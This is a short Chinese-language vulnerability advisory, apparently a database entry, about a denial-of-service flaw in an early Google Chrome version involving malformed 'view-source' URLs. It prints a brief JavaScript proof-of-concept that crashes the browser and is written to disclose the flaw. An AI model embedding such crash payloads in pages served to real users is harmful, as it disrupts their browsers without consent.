Google Chrome畸形'view-source'...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

BUGTRAQ ID: 31035 CNCAN ID:CNCAN-2008090601 Google Chrome是一款谷歌公司新开发的WEB浏览器。 Google Chrome处理特殊构建的HTTP 'view-source'头字段数据存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 构建包含如下代码的WEB页,诱使用户使用Google Chrome打开: &lt;script&gt; a = window.open('view-source:http://123') a.alert(1) &lt;/script&gt; 可导致应用程序崩溃。 Google Chrome 0.2.149 27 目前没有解决方案提供: <a href=http://www.google.com/chrome target=_blank>http://www.google.com/chrome</a>

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息